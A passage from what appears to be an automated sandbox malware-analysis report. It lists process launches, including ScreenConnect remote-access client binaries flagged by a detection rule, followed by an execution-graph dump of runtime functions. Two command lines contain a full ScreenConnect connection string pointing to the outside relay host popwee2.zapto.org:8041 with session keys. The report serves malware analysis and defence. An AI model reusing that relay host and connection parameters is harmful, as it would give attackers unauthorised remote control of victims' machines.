                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:05:01:02
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:05:01:02
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260
                                                                                                                                                                                                                                                  Imagebase:0xfd0000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:05:01:03
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700
                                                                                                                                                                                                                                                  Imagebase:0xfd0000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:05:01:03
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:05:01:03
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:05:01:40
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                  Imagebase:0xba0000
                                                                                                                                                                                                                                                  File size:601'376 bytes
                                                                                                                                                                                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:05:01:40
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6068e0000
                                                                                                                                                                                                                                                  File size:95'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                  Start time:05:01:40
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                                                                                                                                                                                                                                                  Imagebase:0x9b0000
                                                                                                                                                                                                                                                  File size:95'520 bytes
                                                                                                                                                                                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                  Start time:05:01:41
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "d9b9f156-2a83-4b1f-b5ba-62c20ee02a77" "User"
                                                                                                                                                                                                                                                  Imagebase:0x990000
                                                                                                                                                                                                                                                  File size:601'376 bytes
                                                                                                                                                                                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:2.2%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:3.8%
                                                                                                                                                                                                                                                    Total number of Nodes:1464
                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                                    execution_graph 6126 9a7419 6136 9a7fb2 6126->6136 6130 9a7426 6149 9a828e 6130->6149 6133 9a7450 6134 9a4869 _free 15 API calls 6133->6134 6135 9a745b 6134->6135 6153 9a7fbb 6136->6153 6138 9a7421 6139 9a81ee 6138->6139 6140 9a81fa ___scrt_is_nonwritable_in_current_image 6139->6140 6173 9a56e2 EnterCriticalSection 6140->6173 6142 9a8205 6143 9a8270 6142->6143 6146 9a8244 DeleteCriticalSection 6142->6146 6174 9a901c 6142->6174 6187 9a8285 6143->6187 6145 9a827c _abort 6145->6130 6148 9a4869 _free 15 API calls 6146->6148 6148->6142 6150 9a7435 DeleteCriticalSection 6149->6150 6151 9a82a4 6149->6151 6150->6130 6150->6133 6151->6150 6152 9a4869 _free 15 API calls 6151->6152 6152->6150 6154 9a7fc7 ___scrt_is_nonwritable_in_current_image 6153->6154 6163 9a56e2 EnterCriticalSection 6154->6163 6156 9a806a 6168 9a808a 6156->6168 6159 9a7fd6 6159->6156 6162 9a7f6b 61 API calls 6159->6162 6164 9a7465 EnterCriticalSection 6159->6164 6165 9a8060 6159->6165 6160 9a8076 _abort 6160->6138 6162->6159 6163->6159 6164->6159 6171 9a7479 LeaveCriticalSection 6165->6171 6167 9a8068 6167->6159 6172 9a572a LeaveCriticalSection 6168->6172 6170 9a8091 6170->6160 6171->6167 6172->6170 6173->6142 6175 9a9028 ___scrt_is_nonwritable_in_current_image 6174->6175 6176 9a9039 6175->6176 6177 9a904e 6175->6177 6178 9a47f9 _free 15 API calls 6176->6178 6186 9a9049 _abort 6177->6186 6190 9a7465 EnterCriticalSection 6177->6190 6179 9a903e 6178->6179 6181 9a473d _abort 21 API calls 6179->6181 6181->6186 6182 9a906a 6191 9a8fa6 6182->6191 6184 9a9075 6207 9a9092 6184->6207 6186->6142 6445 9a572a LeaveCriticalSection 6187->6445 6189 9a828c 6189->6145 6190->6182 6192 9a8fc8 6191->6192 6193 9a8fb3 6191->6193 6199 9a8fc3 6192->6199 6210 9a7f05 6192->6210 6194 9a47f9 _free 15 API calls 6193->6194 6195 9a8fb8 6194->6195 6197 9a473d _abort 21 API calls 6195->6197 6197->6199 6199->6184 6200 9a828e 15 API calls 6201 9a8fe4 6200->6201 6216 9a732b 6201->6216 6203 9a8fea 6223 9a9d4e 6203->6223 6206 9a4869 _free 15 API calls 6206->6199 6444 9a7479 LeaveCriticalSection 6207->6444 6209 9a909a 6209->6186 6211 9a7f1d 6210->6211 6215 9a7f19 6210->6215 6212 9a732b 21 API calls 6211->6212 6211->6215 6213 9a7f3d 6212->6213 6238 9a89a7 6213->6238 6215->6200 6217 9a734c 6216->6217 6218 9a7337 6216->6218 6217->6203 6219 9a47f9 _free 15 API calls 6218->6219 6220 9a733c 6219->6220 6221 9a473d _abort 21 API calls 6220->6221 6222 9a7347 6221->6222 6222->6203 6224 9a9d5d 6223->6224 6227 9a9d72 6223->6227 6225 9a47e6 __dosmaperr 15 API calls 6224->6225 6229 9a9d62 6225->6229 6226 9a9dad 6228 9a47e6 __dosmaperr 15 API calls 6226->6228 6227->6226 6230 9a9d99 6227->6230 6231 9a9db2 6228->6231 6232 9a47f9 _free 15 API calls 6229->6232 6401 9a9d26 6230->6401 6234 9a47f9 _free 15 API calls 6231->6234 6235 9a8ff0 6232->6235 6236 9a9dba 6234->6236 6235->6199 6235->6206 6237 9a473d _abort 21 API calls 6236->6237 6237->6235 6239 9a89b3 ___scrt_is_nonwritable_in_current_image 6238->6239 6240 9a89bb 6239->6240 6241 9a89d3 6239->6241 6263 9a47e6 6240->6263 6242 9a8a71 6241->6242 6246 9a8a08 6241->6246 6244 9a47e6 __dosmaperr 15 API calls 6242->6244 6247 9a8a76 6244->6247 6266 9a5d23 EnterCriticalSection 6246->6266 6250 9a47f9 _free 15 API calls 6247->6250 6248 9a47f9 _free 15 API calls 6251 9a89c8 _abort 6248->6251 6253 9a8a7e 6250->6253 6251->6215 6252 9a8a0e 6254 9a8a2a 6252->6254 6255 9a8a3f 6252->6255 6256 9a473d _abort 21 API calls 6253->6256 6257 9a47f9 _free 15 API calls 6254->6257 6267 9a8a92 6255->6267 6256->6251 6259 9a8a2f 6257->6259 6261 9a47e6 __dosmaperr 15 API calls 6259->6261 6260 9a8a3a 6316 9a8a69 6260->6316 6261->6260 6264 9a44a8 _free 15 API calls 6263->6264 6265 9a47eb 6264->6265 6265->6248 6266->6252 6268 9a8ac0 6267->6268 6275 9a8ab9 _ValidateLocalCookies 6267->6275 6269 9a8ae3 6268->6269 6270 9a8ac4 6268->6270 6273 9a8b34 6269->6273 6274 9a8b17 6269->6274 6271 9a47e6 __dosmaperr 15 API calls 6270->6271 6272 9a8ac9 6271->6272 6276 9a47f9 _free 15 API calls 6272->6276 6277 9a8b4a 6273->6277 6319 9a8f8b 6273->6319 6278 9a47e6 __dosmaperr 15 API calls 6274->6278 6275->6260 6279 9a8ad0 6276->6279 6322 9a8637 6277->6322 6282 9a8b1c 6278->6282 6283 9a473d _abort 21 API calls 6279->6283 6285 9a47f9 _free 15 API calls 6282->6285 6283->6275 6288 9a8b24 6285->6288 6286 9a8b58 6292 9a8b7e 6286->6292 6293 9a8b5c 6286->6293 6287 9a8b91 6290 9a8beb WriteFile 6287->6290 6291 9a8ba5 6287->6291 6289 9a473d _abort 21 API calls 6288->6289 6289->6275 6294 9a8c0e GetLastError 6290->6294 6305 9a8b74 6290->6305 6296 9a8bdb 6291->6296 6297 9a8bad 6291->6297 6334 9a8417 GetConsoleCP 6292->6334 6298 9a8c52 6293->6298 6329 9a85ca 6293->6329 6294->6305 6354 9a86ad 6296->6354 6299 9a8bcb 6297->6299 6300 9a8bb2 6297->6300 6298->6275 6303 9a47f9 _free 15 API calls 6298->6303 6348 9a887a 6299->6348 6300->6298 6343 9a878c 6300->6343 6306 9a8c77 6303->6306 6305->6275 6305->6298 6307 9a8c2e 6305->6307 6309 9a47e6 __dosmaperr 15 API calls 6306->6309 6310 9a8c49 6307->6310 6311 9a8c35 6307->6311 6309->6275 6359 9a47c3 6310->6359 6312 9a47f9 _free 15 API calls 6311->6312 6314 9a8c3a 6312->6314 6315 9a47e6 __dosmaperr 15 API calls 6314->6315 6315->6275 6400 9a5d46 LeaveCriticalSection 6316->6400 6318 9a8a6f 6318->6251 6364 9a8f0d 6319->6364 6386 9a7eaf 6322->6386 6324 9a8647 6325 9a864c 6324->6325 6326 9a4424 _abort 33 API calls 6324->6326 6325->6286 6325->6287 6327 9a866f 6326->6327 6327->6325 6328 9a868d GetConsoleMode 6327->6328 6328->6325 6331 9a8624 6329->6331 6333 9a85ef 6329->6333 6330 9a8626 GetLastError 6330->6331 6331->6305 6332 9a9101 WriteConsoleW CreateFileW 6332->6333 6333->6330 6333->6331 6333->6332 6335 9a858c _ValidateLocalCookies 6334->6335 6338 9a847a 6334->6338 6335->6305 6337 9a72b7 35 API calls __fassign 6337->6338 6338->6335 6338->6337 6339 9a8500 WideCharToMultiByte 6338->6339 6342 9a8557 WriteFile 6338->6342 6395 9a6052 6338->6395 6339->6335 6340 9a8526 WriteFile 6339->6340 6340->6338 6341 9a85af GetLastError 6340->6341 6341->6335 6342->6338 6342->6341 6346 9a879b 6343->6346 6344 9a8819 WriteFile 6345 9a885f GetLastError 6344->6345 6344->6346 6347 9a885d _ValidateLocalCookies 6345->6347 6346->6344 6346->6347 6347->6305 6350 9a8889 6348->6350 6349 9a8994 _ValidateLocalCookies 6349->6305 6350->6349 6351 9a890b WideCharToMultiByte 6350->6351 6353 9a8940 WriteFile 6350->6353 6352 9a898c GetLastError 6351->6352 6351->6353 6352->6349 6353->6350 6353->6352 6357 9a86bc 6354->6357 6355 9a872e WriteFile 6355->6357 6358 9a8771 GetLastError 6355->6358 6356 9a876f _ValidateLocalCookies 6356->6305 6357->6355 6357->6356 6358->6356 6360 9a47e6 __dosmaperr 15 API calls 6359->6360 6361 9a47ce _free 6360->6361 6362 9a47f9 _free 15 API calls 6361->6362 6363 9a47e1 6362->6363 6363->6275 6373 9a5dfa 6364->6373 6366 9a8f1f 6367 9a8f38 SetFilePointerEx 6366->6367 6368 9a8f27 6366->6368 6370 9a8f2c 6367->6370 6371 9a8f50 GetLastError 6367->6371 6369 9a47f9 _free 15 API calls 6368->6369 6369->6370 6370->6277 6372 9a47c3 __dosmaperr 15 API calls 6371->6372 6372->6370 6374 9a5e1c 6373->6374 6375 9a5e07 6373->6375 6378 9a47e6 __dosmaperr 15 API calls 6374->6378 6380 9a5e41 6374->6380 6376 9a47e6 __dosmaperr 15 API calls 6375->6376 6377 9a5e0c 6376->6377 6379 9a47f9 _free 15 API calls 6377->6379 6381 9a5e4c 6378->6381 6383 9a5e14 6379->6383 6380->6366 6382 9a47f9 _free 15 API calls 6381->6382 6384 9a5e54 6382->6384 6383->6366 6385 9a473d _abort 21 API calls 6384->6385 6385->6383 6387 9a7ec9 6386->6387 6388 9a7ebc 6386->6388 6390 9a7ed5 6387->6390 6391 9a47f9 _free 15 API calls 6387->6391 6389 9a47f9 _free 15 API calls 6388->6389 6392 9a7ec1 6389->6392 6390->6324 6393 9a7ef6 6391->6393 6392->6324 6394 9a473d _abort 21 API calls 6393->6394 6394->6392 6396 9a4424 _abort 33 API calls 6395->6396 6397 9a605d 6396->6397 6398 9a72d1 __fassign 33 API calls 6397->6398 6399 9a606d 6398->6399 6399->6338 6400->6318 6404 9a9ca4 6401->6404 6403 9a9d4a 6403->6235 6405 9a9cb0 ___scrt_is_nonwritable_in_current_image 6404->6405 6415 9a5d23 EnterCriticalSection 6405->6415 6407 9a9cbe 6408 9a9cf0 6407->6408 6409 9a9ce5 6407->6409 6410 9a47f9 _free 15 API calls 6408->6410 6416 9a9dcd 6409->6416 6412 9a9ceb 6410->6412 6431 9a9d1a 6412->6431 6414 9a9d0d _abort 6414->6403 6415->6407 6417 9a5dfa 21 API calls 6416->6417 6420 9a9ddd 6417->6420 6418 9a9de3 6434 9a5d69 6418->6434 6420->6418 6423 9a5dfa 21 API calls 6420->6423 6430 9a9e15 6420->6430 6421 9a5dfa 21 API calls 6424 9a9e21 CloseHandle 6421->6424 6425 9a9e0c 6423->6425 6424->6418 6427 9a9e2d GetLastError 6424->6427 6426 9a5dfa 21 API calls 6425->6426 6426->6430 6427->6418 6428 9a47c3 __dosmaperr 15 API calls 6429 9a9e5d 6428->6429 6429->6412 6430->6418 6430->6421 6443 9a5d46 LeaveCriticalSection 6431->6443 6433 9a9d24 6433->6414 6435 9a5d78 6434->6435 6436 9a5ddf 6434->6436 6435->6436 6441 9a5da2 6435->6441 6437 9a47f9 _free 15 API calls 6436->6437 6438 9a5de4 6437->6438 6439 9a47e6 __dosmaperr 15 API calls 6438->6439 6440 9a5dcf 6439->6440 6440->6428 6440->6429 6441->6440 6442 9a5dc9 SetStdHandle 6441->6442 6442->6440 6443->6433 6444->6209 6445->6189 6446 9a7d1c 6447 9a522b 46 API calls 6446->6447 6448 9a7d21 6447->6448 6590 9a365d 6591 9a3e89 33 API calls 6590->6591 6592 9a3665 6591->6592 5748 9a6893 GetProcessHeap 6593 9a2f53 6594 9a2f7e 6593->6594 6595 9a2f62 6593->6595 6597 9a522b 46 API calls 6594->6597 6595->6594 6596 9a2f68 6595->6596 6598 9a47f9 _free 15 API calls 6596->6598 6599 9a2f85 GetModuleFileNameA 6597->6599 6601 9a2f6d 6598->6601 6600 9a2fa9 6599->6600 6616 9a3077 6600->6616 6602 9a473d _abort 21 API calls 6601->6602 6604 9a2f77 6602->6604 6606 9a31ec 15 API calls 6607 9a2fd3 6606->6607 6608 9a2fe8 6607->6608 6609 9a2fdc 6607->6609 6611 9a3077 33 API calls 6608->6611 6610 9a47f9 _free 15 API calls 6609->6610 6612 9a2fe1 6610->6612 6614 9a2ffe 6611->6614 6613 9a4869 _free 15 API calls 6612->6613 6613->6604 6614->6612 6615 9a4869 _free 15 API calls 6614->6615 6615->6612 6618 9a309c 6616->6618 6617 9a55b6 33 API calls 6617->6618 6618->6617 6620 9a30fc 6618->6620 6619 9a2fc6 6619->6606 6620->6619 6621 9a55b6 33 API calls 6620->6621 6621->6620 5947 9a5fd0 5948 9a5fdc ___scrt_is_nonwritable_in_current_image 5947->5948 5959 9a56e2 EnterCriticalSection 5948->5959 5950 9a5fe3 5960 9a5c8b 5950->5960 5952 9a6001 5984 9a601d 5952->5984 5953 9a5ff2 5953->5952 5973 9a5e64 GetStartupInfoW 5953->5973 5956 9a6012 _abort 5959->5950 5961 9a5c97 ___scrt_is_nonwritable_in_current_image 5960->5961 5962 9a5cbb 5961->5962 5963 9a5ca4 5961->5963 5987 9a56e2 EnterCriticalSection 5962->5987 5965 9a47f9 _free 15 API calls 5963->5965 5966 9a5ca9 5965->5966 5967 9a473d _abort 21 API calls 5966->5967 5969 9a5cb3 _abort 5967->5969 5968 9a5cf3 5995 9a5d1a 5968->5995 5969->5953 5970 9a5cc7 5970->5968 5988 9a5bdc 5970->5988 5974 9a5e81 5973->5974 5975 9a5f13 5973->5975 5974->5975 5976 9a5c8b 22 API calls 5974->5976 5979 9a5f1a 5975->5979 5977 9a5eaa 5976->5977 5977->5975 5978 9a5ed8 GetFileType 5977->5978 5978->5977 5980 9a5f21 5979->5980 5981 9a5f64 GetStdHandle 5980->5981 5982 9a5fcc 5980->5982 5983 9a5f77 GetFileType 5980->5983 5981->5980 5982->5952 5983->5980 5999 9a572a LeaveCriticalSection 5984->5999 5986 9a6024 5986->5956 5987->5970 5989 9a480c _free 15 API calls 5988->5989 5994 9a5bee 5989->5994 5990 9a5bfb 5991 9a4869 _free 15 API calls 5990->5991 5992 9a5c4d 5991->5992 5992->5970 5993 9a59b3 6 API calls 5993->5994 5994->5990 5994->5993 5998 9a572a LeaveCriticalSection 5995->5998 5997 9a5d21 5997->5969 5998->5997 5999->5986 6449 9a7a10 6452 9a7a27 6449->6452 6453 9a7a49 6452->6453 6454 9a7a35 6452->6454 6456 9a7a63 6453->6456 6457 9a7a51 6453->6457 6455 9a47f9 _free 15 API calls 6454->6455 6458 9a7a3a 6455->6458 6462 9a3f72 __fassign 33 API calls 6456->6462 6464 9a7a22 6456->6464 6459 9a47f9 _free 15 API calls 6457->6459 6460 9a473d _abort 21 API calls 6458->6460 6461 9a7a56 6459->6461 6460->6464 6463 9a473d _abort 21 API calls 6461->6463 6462->6464 6463->6464 6622 9a7351 6623 9a735e 6622->6623 6624 9a480c _free 15 API calls 6623->6624 6625 9a7378 6624->6625 6626 9a4869 _free 15 API calls 6625->6626 6627 9a7384 6626->6627 6628 9a480c _free 15 API calls 6627->6628 6631 9a73aa 6627->6631 6630 9a739e 6628->6630 6629 9a59b3 6 API calls 6629->6631 6632 9a4869 _free 15 API calls 6630->6632 6631->6629 6633 9a73b6 6631->6633 6632->6631 5749 9a4c8a 5754 9a4cbf 5749->5754 5752 9a4ca6 5753 9a4869 _free 15 API calls 5753->5752 5755 9a4cd1 5754->5755 5763 9a4c98 5754->5763 5756 9a4d01 5755->5756 5757 9a4cd6 5755->5757 5756->5763 5765 9a681b 5756->5765 5758 9a480c _free 15 API calls 5757->5758 5760 9a4cdf 5758->5760 5762 9a4869 _free 15 API calls 5760->5762 5761 9a4d1c 5764 9a4869 _free 15 API calls 5761->5764 5762->5763 5763->5752 5763->5753 5764->5763 5766 9a6826 5765->5766 5767 9a684e 5766->5767 5769 9a683f 5766->5769 5768 9a685d 5767->5768 5774 9a7e13 5767->5774 5781 9a7e46 5768->5781 5770 9a47f9 _free 15 API calls 5769->5770 5773 9a6844 _abort 5770->5773 5773->5761 5775 9a7e1e 5774->5775 5776 9a7e33 HeapSize 5774->5776 5777 9a47f9 _free 15 API calls 5775->5777 5776->5768 5778 9a7e23 5777->5778 5779 9a473d _abort 21 API calls 5778->5779 5780 9a7e2e 5779->5780 5780->5768 5782 9a7e5e 5781->5782 5783 9a7e53 5781->5783 5785 9a7e66 5782->5785 5791 9a7e6f _free 5782->5791 5784 9a62ff 16 API calls 5783->5784 5789 9a7e5b 5784->5789 5786 9a4869 _free 15 API calls 5785->5786 5786->5789 5787 9a7e99 HeapReAlloc 5787->5789 5787->5791 5788 9a7e74 5790 9a47f9 _free 15 API calls 5788->5790 5789->5773 5790->5789 5791->5787 5791->5788 5792 9a6992 _free 2 API calls 5791->5792 5792->5791 6634 9a1248 6635 9a1250 6634->6635 6651 9a37f7 6635->6651 6637 9a125b 6658 9a1664 6637->6658 6639 9a12cd 6640 9a191f 4 API calls 6639->6640 6650 9a12ea 6639->6650 6642 9a12f2 6640->6642 6641 9a1270 __RTC_Initialize 6641->6639 6664 9a17f1 6641->6664 6644 9a1289 6644->6639 6667 9a18ab InitializeSListHead 6644->6667 6646 9a129f 6668 9a18ba 6646->6668 6648 9a12c2 6674 9a3891 6648->6674 6652 9a3829 6651->6652 6653 9a3806 6651->6653 6652->6637 6653->6652 6654 9a47f9 _free 15 API calls 6653->6654 6655 9a3819 6654->6655 6656 9a473d _abort 21 API calls 6655->6656 6657 9a3824 6656->6657 6657->6637 6659 9a1670 6658->6659 6660 9a1674 6658->6660 6659->6641 6661 9a1681 ___scrt_release_startup_lock 6660->6661 6662 9a191f 4 API calls 6660->6662 6661->6641 6663 9a16ea 6662->6663 6681 9a17c4 6664->6681 6667->6646 6719 9a3e2a 6668->6719 6670 9a18cb 6671 9a18d2 6670->6671 6672 9a191f 4 API calls 6670->6672 6671->6648 6673 9a18da 6672->6673 6673->6648 6675 9a4424 _abort 33 API calls 6674->6675 6676 9a389c 6675->6676 6677 9a38d4 6676->6677 6678 9a47f9 _free 15 API calls 6676->6678 6677->6639 6679 9a38c9 6678->6679 6680 9a473d _abort 21 API calls 6679->6680 6680->6677 6682 9a17da 6681->6682 6683 9a17d3 6681->6683 6690 9a3cf1 6682->6690 6687 9a3c81 6683->6687 6686 9a17d8 6686->6644 6688 9a3cf1 24 API calls 6687->6688 6689 